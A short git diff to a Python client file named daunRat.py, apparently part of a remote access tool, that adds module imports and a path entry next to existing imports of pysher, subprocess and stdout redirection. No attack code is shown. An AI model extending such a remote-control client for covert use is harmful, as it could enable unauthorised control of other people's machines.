diff --git a/client/daunRat.py b/client/daunRat.py index 8e0adcf..8a66dd8 100644 --- a/client/daunRat.py +++ b/client/daunRat.py @@ -4,7 +4,9 @@ import pysher import io from contextlib import redirect_stdout import subprocess - +import daun.modules as daun # needed to use daun functionality from admin +import sys +sys.path.append('daun/modules') client_id = int()